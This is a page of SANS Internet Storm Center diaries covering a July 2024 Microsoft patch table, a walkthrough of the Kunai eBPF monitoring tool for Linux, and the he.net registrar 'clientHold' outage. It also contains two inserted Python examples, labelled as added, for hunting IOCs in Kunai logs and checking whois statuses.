CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
.NET Core and Visual Studio Denial of Service Vulnerability
CVE-2024-30105 | No | No | - | - | Important | 7.5 | 6.5
.NET and Visual Studio Denial of Service Vulnerability
CVE-2024-38095 | No | No | - | - | Important | 7.5 | 6.5
.NET and Visual Studio Remote Code Execution Vulnerability
CVE-2024-35264 | Yes | No | - | - | Important | 8.1 | 7.1
.NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
CVE-2024-38081 | No | No | - | - | Important | 7.3 | 6.4
Arm: CVE-2024-37985 Systematic Identification and Characterization of Proprietary Prefetchers
CVE-2024-37985 | Yes | No | - | - | Important | 5.9 | 5.2
Azure CycleCloud Elevation of Privilege Vulnerability
CVE-2024-38092 | No | No | - | - | Important | 8.8 | 7.9
Azure DevOps Server Spoofing Vulnerability
CVE-2024-35266 | No | No | - | - | Important | 7.6 | 6.6
CVE-2024-35267 | No | No | - | - | Important | 7.6 | 6.6
Azure Kinect SDK Remote Code Execution Vulnerability
CVE-2024-38086 | No | No | - | - | Important | 6.4 | 5.6
Azure Network Watcher VM Extension Elevation of Privilege Vulnerability
CVE-2024-35261 | No | No | - | - | Important | 7.8 | 7.0
BitLocker Security Feature Bypass Vulnerability
CVE-2024-38058 | No | No | - | - | Important | 6.8 | 5.9
CERT/CC: CVE-2024-3596 RADIUS Protocol Spoofing Vulnerability
CVE-2024-3596 | No | No | - | - | Important | 7.5 | 6.5
DCOM Remote Cross-Session Activation Elevation of Privilege Vulnerability
CVE-2024-38061 | No | No | - | - | Important | 7.5 | 6.5
DHCP Server Service Remote Code Execution Vulnerability
CVE-2024-38044 | No | No | - | - | Important | 7.2 | 6.3
Github: CVE-2024-38517 TenCent RapidJSON Elevation of Privilege Vulnerability
CVE-2024-38517 | No | No | - | - | Moderate | 7.8 | 6.8
Github: CVE-2024-39684 TenCent RapidJSON Elevation of Privilege Vulnerability
CVE-2024-39684 | No | No | - | - | Moderate | 7.8 | 6.8
Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38054 | No | No | - | - | Important | 7.8 | 6.8
CVE-2024-38052 | No | No | - | - | Important | 7.8 | 6.8
CVE-2024-38057 | No | No | - | - | Important | 7.8 | 6.8
Microsoft Defender for IoT Elevation of Privilege Vulnerability
CVE-2024-38089 | No | No | - | - | Important | 9.1 | 7.9
Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability
CVE-2024-30061 | No | No | - | - | Important | 7.3 | 6.4
Microsoft Message Queuing Information Disclosure Vulnerability
CVE-2024-38017 | No | No | - | - | Important | 5.5 | 5.0
Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
CVE-2024-37334 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Office Remote Code Execution Vulnerability
CVE-2024-38021 | No | No | - | - | Important | 8.8 | 7.7
Microsoft Outlook Spoofing Vulnerability
CVE-2024-38020 | No | No | - | - | Moderate | 6.5 | 5.7
Microsoft SharePoint Remote Code Execution Vulnerability
CVE-2024-38094 | No | No | - | - | Important | 7.2 | 6.3
Microsoft SharePoint Server Information Disclosure Vulnerability
CVE-2024-32987 | No | No | - | - | Important | 7.5 | 6.5
Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-38023 | No | No | - | - | Critical | 7.2 | 6.3
CVE-2024-38024 | No | No | - | - | Important | 7.2 | 6.3
Microsoft WS-Discovery Denial of Service Vulnerability
CVE-2024-38091 | No | No | - | - | Important | 7.5 | 6.5
Microsoft Windows Codecs Library Information Disclosure Vulnerability
CVE-2024-38055 | No | No | - | - | Important | 5.5 | 4.8
CVE-2024-38056 | No | No | - | - | Important | 5.5 | 4.8
Microsoft Windows Performance Data Helper Library Remote Code Execution Vulnerability
CVE-2024-38025 | No | No | - | - | Important | 7.2 | 6.3
CVE-2024-38019 | No | No | - | - | Important | 7.2 | 6.3
CVE-2024-38028 | No | No | - | - | Important | 7.2 | 6.3
Microsoft Windows Server Backup Elevation of Privilege Vulnerability
CVE-2024-38013 | No | No | - | - | Important | 6.7 | 5.8
Microsoft Xbox Remote Code Execution Vulnerability
CVE-2024-38032 | No | No | - | - | Important | 7.1 | 6.2
PowerShell Elevation of Privilege Vulnerability
CVE-2024-38043 | No | No | - | - | Important | 7.8 | 6.8
CVE-2024-38033 | No | No | - | - | Important | 7.3 | 6.4
CVE-2024-38047 | No | No | - | - | Important | 7.8 | 6.8
SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability
CVE-2024-38088 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-38087 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21332 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21333 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21335 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21373 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21398 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21414 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21415 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21428 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37318 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37332 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37331 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-35271 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-35272 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-20701 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21303 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21308 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21317 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21331 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21425 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37319 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37320 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37321 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37322 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37323 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37324 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-21449 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37326 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37327 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37328 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37329 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37330 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37333 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37336 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-28928 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-35256 | No | No | - | - | Important | 8.8 | 7.7
Secure Boot Security Feature Bypass Vulnerability
CVE-2024-28899 | No | No | - | - | Important | 8.8 | 7.7
CVE-2024-37969 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37970 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37974 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37981 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37986 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37987 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-26184 | No | No | - | - | Important | 6.8 | 5.9
CVE-2024-37971 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37972 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37973 | No | No | - | - | Important | 8.4 | 7.3
CVE-2024-37975 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37977 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37978 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37984 | No | No | - | - | Important | 8.4 | 7.3
CVE-2024-37988 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-37989 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-38010 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-38011 | No | No | - | - | Important | 8.0 | 7.0
CVE-2024-38065 | No | No | - | - | Important | 6.8 | 5.9
Win32k Elevation of Privilege Vulnerability
CVE-2024-38059 | No | No | - | - | Important | 7.8 | 6.8
Windows Cryptographic Services Security Feature Bypass Vulnerability
CVE-2024-30098 | No | No | - | - | Important | 7.5 | 6.5
Windows Distributed Transaction Coordinator Remote Code Execution Vulnerability
CVE-2024-38049 | No | No | - | - | Important | 6.6 | 5.8
Windows Enroll Engine Security Feature Bypass Vulnerability
CVE-2024-38069 | No | No | - | - | Important | 7.0 | 6.1
Windows Fax Service Remote Code Execution Vulnerability
CVE-2024-38104 | No | No | - | - | Important | 8.8 | 7.7
Windows File Explorer Elevation of Privilege Vulnerability
CVE-2024-38100 | No | No | - | - | Important | 7.8 | 6.8
Windows Filtering Platform Elevation of Privilege Vulnerability
CVE-2024-38034 | No | No | - | - | Important | 7.8 | 6.8
Windows Graphics Component Elevation of Privilege Vulnerability
CVE-2024-38085 | No | No | - | - | Important | 7.8 | 6.8
CVE-2024-38079 | No | No | - | - | Important | 7.8 | 6.8
Windows Graphics Component Remote Code Execution Vulnerability
CVE-2024-38051 | No | No | - | - | Important | 7.8 | 6.8
Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2024-38080 | No | Yes | - | - | Important | 7.8 | 6.8
Windows Image Acquisition Elevation of Privilege Vulnerability
CVE-2024-38022 | No | No | - | - | Important | 7.0 | 6.1
Windows Imaging Component Remote Code Execution Vulnerability
CVE-2024-38060 | No | No | - | - | Critical | 8.8 | 7.7
Windows Kernel Information Disclosure Vulnerability
CVE-2024-38041 | No | No | - | - | Important | 5.5 | 4.8
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38062 | No | No | - | - | Important | 7.8 | 6.8
Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability
%%cve:2024-38102%% No No - - Important 6.5 5.7
%%cve:2024-38101%% No No - - Important 6.5 5.7
%%cve:2024-38105%% No No - - Important 6.5 5.7
Windows Layer-2 Bridge Network Driver Remote Code Execution Vulnerability
%%cve:2024-38053%% No No - - Important 8.8 7.7
Windows Line Printer Daemon Service Denial of Service Vulnerability
%%cve:2024-38027%% No No - - Important 6.5 5.7
Windows LockDown Policy (WLDP) Security Feature Bypass Vulnerability
%%cve:2024-38070%% No No - - Important 7.8 6.8
Windows MSHTML Platform Spoofing Vulnerability
%%cve:2024-38112%% No Yes - - Important 7.5 7.0
Windows MultiPoint Services Remote Code Execution Vulnerability
%%cve:2024-30013%% No No - - Important 8.8 7.7
Windows NTLM Spoofing Vulnerability
%%cve:2024-30081%% No No - - Important 7.1 6.2
Windows Network Driver Interface Specification (NDIS) Denial of Service Vulnerability
%%cve:2024-38048%% No No - - Important 6.5 5.7
Windows Online Certificate Status Protocol (OCSP) Server Denial of Service Vulnerability
%%cve:2024-38031%% No No - - Important 7.5 6.5
%%cve:2024-38067%% No No - - Important 7.5 6.5
%%cve:2024-38068%% No No - - Important 7.5 6.5
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
%%cve:2024-30079%% No No - - Important 7.8 6.8
Windows Remote Access Connection Manager Information Disclosure Vulnerability
%%cve:2024-30071%% No No - - Important 4.7 4.1
Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability
%%cve:2024-38015%% No No - - Important 7.5 6.5
Windows Remote Desktop Licensing Service Denial of Service Vulnerability
%%cve:2024-38071%% No No - - Important 7.5 6.5
%%cve:2024-38072%% No No - - Important 7.5 6.5
%%cve:2024-38073%% No No - - Important 7.5 6.5
%%cve:2024-38099%% No No - - Important 5.9 5.2
Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability
%%cve:2024-38077%% No No - - Critical 9.8 8.5
%%cve:2024-38074%% No No - - Critical 9.8 8.5
%%cve:2024-38076%% No No - - Critical 9.8 8.5
Windows TCP/IP Information Disclosure Vulnerability
%%cve:2024-38064%% No No - - Important 7.5 6.5
Windows Text Services Framework Elevation of Privilege Vulnerability
%%cve:2024-21417%% No No Less Likely Less Likely Important 8.8 7.7
Windows Themes Spoofing Vulnerability
%%cve:2024-38030%% No No - - Important 6.5 5.7
Windows Win32k Elevation of Privilege Vulnerability
%%cve:2024-38066%% No No - - Important 7.8 6.8
Windows Workstation Service Elevation of Privilege Vulnerability
%%cve:2024-38050%% No No - - Important 7.8 6.8
Windows iSCSI Service Denial of Service Vulnerability
%%cve:2024-35270%% No No - - Important 5.3 4.6
Xbox Wireless Adapter Remote Code Execution Vulnerability
%%cve:2024-38078%% No No - - Important 7.5 6.5

---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

Published: 2024-07-08

Kunai: Keep an Eye on your Linux Hosts Activity

Microsoft has a very popular tool (part of the Sysinternals suite) called Sysmon[1]. It is a system service and device driver designed to monitor and log system activity, including very useful events like process creations, network connections, DNS requests, file changes, and more. This tool is deployed by many organizations because it's a great companion to expand visibility into your Windows environments. Many SOCs rely on it to perform investigations and hunting.

A while ago, Microsoft decided to port Sysmon to Linux and, logically, called it SysmonForLinux[2]. Unfortunately, the tool never got the same traction, for multiple reasons. First of all, the core developer left Microsoft after the first release of the tool, and it definitely lacks updates and follow-up. A good way to check this is to have a look at the open issues on the GitHub repository. There was a small update a few months ago, but without new exciting features. Also, Microsoft tried to reproduce the Windows Sysmon on Linux, but the two operating systems do not work in the same way. Anyway, I tested SysmonForLinux[3] (and it's still running on the server), but I don't use it in production.

Last week, I attended « Pass The Salt », a conference focusing on open-source software and cybersecurity. I participated in a very interesting workshop about « Kunai ». This tool, developed by Quentin Jérôme from CIRCL (the Luxembourg CERT), aims to replace SysmonForLinux. Its goal is to record and log system activity, but in a more «Linux-oriented» flavor. It was presented for the first time at hack.lu in 2023, and it has now reached enough maturity to be tested and deployed on some Linux hosts.

Kunai is developed in Rust and uses eBPF to interact with the kernel (it is compatible with all the Linux LTS kernels from 5.4 to 6.6). eBPF programs can be attached to various hooks in the kernel, such as system calls, tracepoints, and network events, allowing them to run in response to specific events or conditions.

Kunai's core features are:

  • Single executable (really simple to deploy)
  • Events are enriched with a lot of data
  • Support for containers, namespaces
  • Filtering (to reduce the noise - this is a critical step in your deployment!)
  • Hunting (based on an IOC list)
  • JSON output to log events

To test it, just run Kunai as root:

$ sudo ./kunai | tee -a /var/log/kunai/events.log | jq .

This command launches Kunai, which will log all events without any filter. Let's run a quick test:

$ curl https://isc.sans.edu

Curl will generate a lot of events (with the default config) but some of them are interesting.

Creation of the process:

{
  "data": {
    "ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/bin/bash",
    "parent_exe": "/usr/bin/bash",
    "command_line": "curl https://isc.sans.edu",
    "exe": {
      "file": "/usr/bin/curl",
      "md5": "25828b12203bb53e5f9bc54d2f8507a7",
      "sha1": "4bfe301715d6564404f6ebd56156c668329cc83b",
      "sha256": "53a2fe036f8def7b4372246ffa7835f97cdeb17268e7c8df9756f42baf28cc0f",
      "sha512": "c01c7298103bd2adaf432a807c65d2eccfbed9ce820d80424d03accdceb9c801167f65cfb93ea1b5677fdbf8235e34de061a449f03fd45d58fd913dce139aa51",
      "size": 260328
    }
  },
  "info": {
    "host": {
      "uuid": "2bb02904-9daa-5be5-adcb-5371b78c1866",
      "name": "ubuntu-vm",
      "container": null
    },
    "event": {
      "source": "kunai",
      "id": 1,
      "name": "execve",
      "uuid": "be8c77c8-ec40-959d-87af-39e19364f277",
      "batch": 161
    },
    "task": {
      "name": "curl",
      "pid": 9301,
      "tgid": 9301,
      "guuid": "09e8471d-730a-0000-c3d5-65bb55240000",
      "uid": 1000,
      "gid": 1000,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400000"
    },
    "parent_task": {
      "name": "bash",
      "pid": 9292,
      "tgid": 9292,
      "guuid": "95447ea0-6d0a-0000-c3d5-65bb4c240000",
      "uid": 1000,
      "gid": 1000,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400000"
    },
    "utc_time": "2024-07-06T05:27:19.916790817Z"
  }
}

The corresponding DNS Request:

{
  "data": {
    "ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/sbin/sshd|/usr/bin/bash|/usr/bin/sudo|/usr/bin/sudo|/usr/bin/bash",
    "command_line": "curl https://isc.sans.edu",
    "exe": {
      "file": "/usr/bin/curl"
    },
    "query": "isc.sans.edu",
    "proto": "udp",
    "response": "45.60.31.34;45.60.103.34",
    "dns_server": {
      "ip": "127.0.0.53",
      "port": 53,
      "public": true,
      "is_v6": false
    }
  },
  "info": {
    "host": {
      "uuid": "2bb02904-9daa-5be5-adcb-5371b78c1866",
      "name": "ubuntu-vm",
      "container": null
    },
    "event": {
      "source": "kunai",
      "id": 61,
      "name": "dns_query",
      "uuid": "5850ea54-ee1f-c38f-3dc6-294d8ae689b0",
      "batch": 3355
    },
    "task": {
      "name": "curl",
      "pid": 2350,
      "tgid": 2349,
      "guuid": "d12e76a0-7e02-0000-b116-fe882d090000",
      "uid": 0,
      "gid": 0,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400040"
    },
    "parent_task": {
      "name": "bash",
      "pid": 1709,
      "tgid": 1709,
      "guuid": "2672a103-1100-0000-b116-fe88ad060000",
      "uid": 0,
      "gid": 0,
      "namespaces": {
        "mnt": 4026531841
      },
      "flags": "0x400100"
    },
    "utc_time": "2024-07-06T05:27:19.942717828Z"
  }
}

I like the "ancestors" field that reveals the complete process tree!

One of the critical tasks to perform with Kunai is to know what you're looking for and to filter out unwanted events (exactly like with Sysmon). The simple curl command tested above generated 49 events! Most of them are of the type 'mmap_exec'. This event is generated whenever the mmap[4] syscall is used to map an executable file into memory with execute protection. This syscall is typically related to loading a dynamic library, but it may also reveal malicious activity, for example when malware tries to load shellcode.

Logically, you can write filters to reduce the noise and get rid of these events. Here, Kunai and Sysmon work in the same way: try to reduce the noise, but not too much, or you increase the chances of missing interesting events.

Here is a simple filter:

$ cat filter.yaml
name: log.interesting_events
params:
    filter: true
match-on:
    events:
        kunai: [ 1,2,61 ]

The list of supported events is available in the documentation[5]. In the example above, we will record only:

  • Execve (ID 1) 
  • Execve script (reports more details about script interpreters) (ID 2)
  • Dns query (ID 61)

Now restart Kunai:

$ sudo ./kunai -r filter.yaml | tee -a /var/log/kunai/events.log | jq .

You can also hunt for specific IOCs by providing another configuration file:

$ cat simple_ioc.json
{"uuid": "435358ae-4ca0-4573-8b9f-cd725de75103", "source": "misp", "value": "8.8.8.8"}

"value" can be a hash, a path, an IP address or a domain/FQDN.

$ sudo ./kunai -I simple_ioc.json | tee -a /var/log/kunai/events.log | jq .
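As an added example (not part of Kunai or of this diary), here is a small Python script that processes a Kunai JSON log the way the filter and IOC files above do: it keeps only the event ids listed in filter.yaml, matches exe paths, file hashes, DNS queries and resolved IPs against a list in the simple_ioc.json format, and rebuilds the process tree from the "ancestors" field. The sample events and IOC uuids are constructed, and the event id used for mmap_exec in the sample is a placeholder, not Kunai's real id.

```python
import json

# Event ids from the filter.yaml above: execve (1), execve_script (2), dns_query (61).
INTERESTING_IDS = {1, 2, 61}

# Constructed sample events, shaped like the Kunai JSON above but trimmed to the
# fields this script reads. Id 42 for mmap_exec is a placeholder, not Kunai's real id.
SAMPLE_EVENTS = [
    {"data": {"ancestors": "/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/bin/bash",
              "command_line": "curl https://isc.sans.edu", "exe": {"file": "/usr/bin/curl"}},
     "info": {"event": {"id": 1, "name": "execve"}, "task": {"name": "curl", "pid": 9301}}},
    {"data": {"exe": {"file": "/usr/lib/x86_64-linux-gnu/libc.so.6"}},
     "info": {"event": {"id": 42, "name": "mmap_exec"}, "task": {"name": "curl", "pid": 9301}}},
    {"data": {"exe": {"file": "/usr/lib/x86_64-linux-gnu/libssl.so.3"}},
     "info": {"event": {"id": 42, "name": "mmap_exec"}, "task": {"name": "curl", "pid": 9301}}},
    {"data": {"query": "isc.sans.edu", "response": "45.60.31.34;45.60.103.34",
              "exe": {"file": "/usr/bin/curl"}},
     "info": {"event": {"id": 61, "name": "dns_query"}, "task": {"name": "curl", "pid": 9301}}},
    {"data": {"query": "dns.google", "response": "8.8.8.8;8.8.4.4", "exe": {"file": "/usr/bin/dig"}},
     "info": {"event": {"id": 61, "name": "dns_query"}, "task": {"name": "dig", "pid": 9310}}},
]
# One JSON object per line, as written by `kunai | tee -a events.log`, plus a truncated line.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS) + '\n{"data": {"exe\n'

# IOC list in the shape of simple_ioc.json above (uuids are constructed values).
IOCS = [{"uuid": "00000000-0000-4000-8000-000000000001", "source": "misp", "value": "8.8.8.8"},
        {"uuid": "00000000-0000-4000-8000-000000000002", "source": "misp", "value": "/usr/bin/curl"}]

def parse_events(text):
    """Parse one JSON event per line, skipping blank or truncated lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a half-written last line is common while kunai is still running
    return events

def event_meta(event, key):
    return event.get("info", {}).get("event", {}).get(key)

def filter_events(events, ids=INTERESTING_IDS):
    """Keep only the listed event ids, mirroring the match-on section of filter.yaml."""
    return [e for e in events if event_meta(e, "id") in ids]

def indicators(event):
    """Values an IOC can match: exe path, file hashes, DNS query and resolved IPs."""
    data = event.get("data", {})
    exe = data.get("exe", {})
    values = {exe[k] for k in ("file", "md5", "sha1", "sha256", "sha512") if k in exe}
    if "query" in data:
        values.add(data["query"])
    values.update(ip for ip in data.get("response", "").split(";") if ip)
    return values

def hunt(events, iocs):
    """Return (ioc value, event name, task name) for every event touching an IOC."""
    wanted = {i["value"] for i in iocs}
    hits = []
    for e in events:
        task = e.get("info", {}).get("task", {}).get("name", "?")
        for v in sorted(indicators(e) & wanted):
            hits.append((v, event_meta(e, "name"), task))
    return hits

def process_chain(event):
    """Rebuild the process tree from 'ancestors' plus the event's own executable."""
    data = event.get("data", {})
    chain = [p for p in data.get("ancestors", "").split("|") if p]
    if data.get("exe", {}).get("file"):
        chain.append(data["exe"]["file"])
    return chain
```

On a real events.log, feed the file contents to parse_events and run hunt with the IOC list you would otherwise pass to kunai -I.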

To generate a list of interesting IOCs, there is an integration available with a tool that extracts data from your MISP instance and generates a file compatible with Kunai:

$ ./misp-to-kunai.py -h
usage: misp-to-kunai.py [-h] [-c CONFIG] [-s] [-l LAST] [-o OUTPUT] [--overwrite] [--all] [--tags TAGS] [--wait WAIT] [--service]

Tool pulling IoCs from a MISP instance and converting them to be loadable in Kunai

options:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Configuration file. Default: /opt/workshops/tools/misp/config.toml
  -s, --silent          Silent HTTPS warnings
  -l LAST, --last LAST  Process events updated the last days
  -o OUTPUT, --output OUTPUT
                        Output file
  --overwrite           Overwrite output file (default is to append)
  --all                 Process all events, published and unpublished. By default only published events are processed.
  --tags TAGS           Comma separated list of (event tags) to pull iocs for
  --wait WAIT           Wait time in seconds between to runs in service mode
  --service             Run in service mode (i.e endless loop)

Kunai still needs to be improved. During the workshop, we had great exchanges with the developer and shared some ideas. For example, there is a lack of integration with the system: there is no automatic log management (like rotation), and you need to write your own systemd integration to start/stop it automatically.

I'm testing the tool on some hosts and processing the JSON data in my Splunk instance. It provides great visibility into Linux systems! Worth mentioning is that the impact on system performance remains acceptable (but it will be directly related to the logging policy you use).

[1] https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
[2] https://github.com/Sysinternals/SysmonForLinux
[3] https://isc.sans.edu/diary/Whos+Resolving+This+Domain/29462
[4] https://man7.org/linux/man-pages/man2/mmap.2.html
[5] https://why.kunai.rocks/docs/category/kunai---events

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

Published: 2024-07-05

Overlooked Domain Name Resiliency Issues: Registrar Communications

I often think the Internet would work better without DNS. People unable to remember an IP address would be unable to use it. But on the other hand, there is more to DNS than translating a human-readable hostname to a "machine-readable" IP address. DNS does allow us to use consistent labels even as the IP address changes.

Many critical resources are only referred to by hostname, not by IP address. This does include part of the DNS infrastructure itself. NS records point to hostnames, not IP addresses, and we use glue records (A records, actually) to resolve them. Organizations typically rely on multiple authoritative name servers that automatically replicate updates between them to provide resiliency for DNS. This process is typically quite resilient, and cloud providers offer additional services to ensure data availability. Anycast name servers can provide additional resilience to this setup.

However, there is a weak point in this setup: Registrars. Yesterday, Hurricane Electric, a significant internet transit provider, experienced this problem [1]. 

As an internet transit provider, Hurricane Electric relies on BGP (Border Gateway Protocol) to route traffic to and from its customers. The associated routers are identified with hostnames like "ns1-ns5.he.net". However, yesterday the name resolution for he.net failed. It probably didn't help that this happened on a major holiday in the US.

The domain "he.net" is hosted with Network Solutions. Network Solutions is one of the "original" domain registrars but has been going through the usual acquisitions and mergers. They currently appear to be owned by Newfold, a company that happens to be located in Jacksonville, FL, where I happen to reside, too.

Yesterday, he.net stopped resolving. The technical issue was that the he.net domain was removed from the .net zone. Without any nameservers being returned by .net nameservers, clients could not resolve he.net names. The registrar is responsible for maintaining this information. Registrars are "special" because they have the contracts in place to update these top-level domains with whoever maintains them. Whois can be used to identify these relationships. For he.net, the whois record returned [2]: 

   Domain Name: HE.NET
   Registry Domain ID: 486609_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.networksolutions.com
   Registrar URL: http://networksolutions.com
   Updated Date: 2024-07-04T15:06:46Z
   Creation Date: 1995-07-31T04:00:00Z
   Registry Expiry Date: 2033-07-30T04:00:00Z
   Registrar: Network Solutions, LLC
   Registrar IANA ID: 2
   Registrar Abuse Contact Email: domain.operations at web.com
   Registrar Abuse Contact Phone: +1.8777228662
   Domain Status: clientHold https://icann.org/epp#clientHold
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

The important line is the first "Domain Status" one: The domain is marked as "clientHold". According to ICANN, this means:

This status code tells your domain's registry to not activate your domain in the DNS and as a consequence, it will not resolve. It is an uncommon status that is usually enacted during legal disputes, non-payment, or when your domain is subject to deletion. 

Often, this status indicates an issue with your domain that needs resolution. If so, you should contact your registrar to resolve the issue. If your domain does not have any issues, but you need it to resolve, you must first contact your registrar and request that they remove this status code.

According to Hurricane Electric, someone maliciously or accidentally reported a page at he.net for phishing. Network Solutions, in return, set the "client hold" status, which effectively removed he.net from DNS. The issue was amplified by Network Solutions not offering a simple customer support channel to resolve the issue. It took several hours to resolve, leading to routing issues for he.net customers.
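As an added example (not from this diary), the following Python snippet parses a whois record like the one above and returns the findings a domain monitoring job should alert on: a hold status that takes the domain out of DNS, missing registrar locks, and an approaching expiry. The hold and lock status sets and the 60-day expiry threshold are my own assumptions; the input is the he.net record quoted above, re-typed as a constant.

```python
import re
from datetime import datetime, timedelta, timezone

# The he.net whois record quoted above, as a constructed input string.
HE_NET_WHOIS = """\
   Domain Name: HE.NET
   Registry Domain ID: 486609_DOMAIN_NET-VRSN
   Registrar WHOIS Server: whois.networksolutions.com
   Registrar URL: http://networksolutions.com
   Updated Date: 2024-07-04T15:06:46Z
   Creation Date: 1995-07-31T04:00:00Z
   Registry Expiry Date: 2033-07-30T04:00:00Z
   Registrar: Network Solutions, LLC
   Registrar IANA ID: 2
   Registrar Abuse Contact Email: domain.operations at web.com
   Registrar Abuse Contact Phone: +1.8777228662
   Domain Status: clientHold https://icann.org/epp#clientHold
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
"""

# EPP status codes that stop the domain from resolving or signal pending removal (assumed set).
HOLD_STATUSES = {"clientHold", "serverHold", "pendingDelete", "redemptionPeriod"}
# Registrar locks a production domain is normally expected to carry (assumed set).
EXPECTED_LOCKS = {"clientTransferProhibited", "clientDeleteProhibited", "clientUpdateProhibited"}

def parse_whois(text):
    """Return a dict of fields; repeated keys such as 'Domain Status' become lists."""
    record = {}
    for line in text.splitlines():
        m = re.match(r"\s*([^:]+?):\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        record.setdefault(key, []).append(value)
    return record

def statuses(record):
    """Keep only the EPP code from each 'Domain Status' line, dropping the ICANN URL."""
    return {v.split()[0] for v in record.get("Domain Status", []) if v}

def check_domain(record, now_iso=None, expiry_warn_days=60):
    """Findings a monitoring job should alert on; now_iso lets tests pin the clock."""
    now = datetime.fromisoformat(now_iso) if now_iso else datetime.now(timezone.utc)
    codes = statuses(record)
    findings = []
    for code in sorted(codes & HOLD_STATUSES):
        findings.append(f"HOLD: domain carries {code}; it will not resolve until the registrar clears it")
    for lock in sorted(EXPECTED_LOCKS - codes):
        findings.append(f"LOCK MISSING: {lock}")
    for raw in record.get("Registry Expiry Date", []):
        expiry = datetime.fromisoformat(raw.replace("Z", "+00:00"))
        if expiry - now < timedelta(days=expiry_warn_days):
            findings.append(f"EXPIRY: domain expires {raw}")
    return findings
```

Run it against the whois output of each domain you operate on a schedule; the clientHold finding is the one that would have signaled the he.net outage.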

Sadly, I don't think there is a "simple" solution for this issue. Of course, you should select a reliable registrar with reasonable customer support offerings. But I am not sure one exists. Network Solutions is offering competitive pricing but is not the cheapest domain registrar. For convenience, I do like to keep all my domains with one registrar. But this may backfire if you have a dispute with that one registrar.

Using different domains for different purposes can also help. This way, if one of your domains is having issues, you can still use the other domain to communicate.

